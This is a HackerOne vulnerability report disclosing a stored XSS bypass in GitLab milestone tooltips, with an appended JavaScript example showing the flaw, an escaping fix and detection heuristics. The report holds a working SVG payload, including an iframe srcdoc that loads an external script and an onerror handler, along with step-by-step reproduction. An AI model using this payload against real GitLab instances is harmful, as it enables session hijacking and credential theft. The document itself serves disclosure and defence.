Stored XSS in milestone tooltips
HackerOne report #1054401 by mike12
on 2020-12-08, assigned to @ngeorge1:
Report
Hi GitLab!
I found a way to bypass the fix for my old report. See the vulnerable code.
This XSS works for:
- gitlab.com using Firefox (tested in Firefox 83.0)
- A self-hosted GitLab instance without CSP using Safari (tested in Safari 13.1)
Steps to reproduce using Firefox
1. Open your browser and navigate to https://gitlab.com
2. Create a new project
3. Add a file named demo.svg to the project with the following content:
<svg id="x" xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <!-- gitlab.com using Firefox -->
  <foreignObject>
    <iframe xmlns="http://www.w3.org/1999/xhtml" srcdoc='&lt;script src=https://gitlab.com/mike12-h1/csp/-/raw/master/index.js&gt; &lt;/script&gt;'></iframe>
  </foreignObject>
  <!-- A self-hosted GitLab instance without CSP using Safari -->
  <image href="foo" onerror="alert('onerror')"/>
</svg>
4. Navigate to Issues > Milestones
5. Create a new milestone with the following title:
<svg width="100"><use xlink:href="/<YOUR-USERNAME>/<YOUR-PROJECT>/-/raw/master/demo.svg#x" /></svg>
(Replace <YOUR-USERNAME> and <YOUR-PROJECT> with your values)
6. Navigate to Issues > List
7. Create a new issue
8. Click the milestone icon in the right sidebar
9. Select the milestone created in step 5
10. Hover your mouse over the milestone icon
Steps to reproduce using Safari
- Run a self-hosted GitLab instance
- Repeat steps 2 through 11 from the "Steps to reproduce using Firefox" section.
Impact
An attacker can:
- Perform any action within the application that a user can perform
- Steal sensitive user data, including credentials
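The bug class behind this report, as an added example that is not GitLab's code: a milestone title interpolated into tooltip markup without escaping turns an `<svg><use>` reference to a raw repository file into live SVG. The sample title below is constructed in the shape of the report's payload (the user/project path is a placeholder), and the indicator check is a defender-side heuristic, not GitLab's sanitizer.

```javascript
// Added example, not GitLab's code. Models the milestone-tooltip bug from the
// report: an unescaped title becomes markup, so <svg><use href=...> is parsed
// as real elements. Also shows a check for the SVG constructs the report uses.

// Constructed sample titles (the user/project path is a placeholder).
const PAYLOAD_TITLE =
  '<svg width="100"><use xlink:href="/some-user/some-project/-/raw/master/demo.svg#x" /></svg>';
const BENIGN_TITLE = 'Release 13.6 <beta> & hotfixes';

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable rendering: the title is interpolated as markup, so any tags in it
// are parsed as elements when the tooltip is inserted into the DOM.
function tooltipHtmlVulnerable(title) {
  return `<span class="milestone-tooltip">${title}</span>`;
}

// Hardened rendering: the title is escaped first, so the browser shows the
// literal text "<svg ...>" instead of creating an <svg> element.
function tooltipHtmlSafe(title) {
  return `<span class="milestone-tooltip">${escapeHtml(title)}</span>`;
}

// Does the rendered fragment contain a start tag other than our wrapper span?
function hasInjectedTag(html) {
  const inner = html.replace(/^<span class="milestone-tooltip">|<\/span>$/g, '');
  return /<[a-z]/i.test(inner);
}

// Defender check: name the SVG constructs this report relies on. Usable as a
// unit test for a sanitizer or as a review heuristic over stored titles.
function svgAbuseIndicators(title) {
  const checks = [
    ['svg-use-external-ref', /<use\b[^>]*\b(?:xlink:)?href\s*=/i],
    ['foreignObject', /<foreignObject\b/i],
    ['iframe-srcdoc', /<iframe\b[^>]*\bsrcdoc\s*=/i],
    ['event-handler-attribute', /<[a-z][^>]*\bon[a-z]+\s*=/i],
  ];
  return checks.filter(([, re]) => re.test(title)).map(([name]) => name);
}
```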